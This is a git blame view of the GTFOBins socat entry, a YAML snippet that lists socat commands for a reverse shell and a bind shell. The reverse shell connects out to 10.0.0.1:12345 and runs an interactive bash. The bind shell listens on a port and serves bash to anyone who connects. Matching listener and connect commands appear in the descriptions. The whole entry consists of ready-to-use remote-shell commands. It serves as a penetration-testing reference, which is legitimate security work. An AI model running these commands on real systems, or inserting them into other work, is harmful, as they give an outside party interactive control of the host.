GTFOBins.github.io/_gtfobins/socat.md

14 lines
559 B
Markdown
Raw Normal View History

2018-05-22 22:40:27 +02:00
---
functions:
reverse-shell:
2018-05-23 09:08:13 +02:00
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> to receive the shell on the other end.
2018-05-22 22:40:27 +02:00
code: |
RHOST=10.0.0.1
2018-05-23 09:08:13 +02:00
RPORT=12345
2018-05-22 22:40:27 +02:00
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
2018-05-23 21:24:08 +02:00
bind-shell:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:10.0.0.2:12345</code> to connect to the shell on the other end.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
2018-05-22 22:40:27 +02:00
---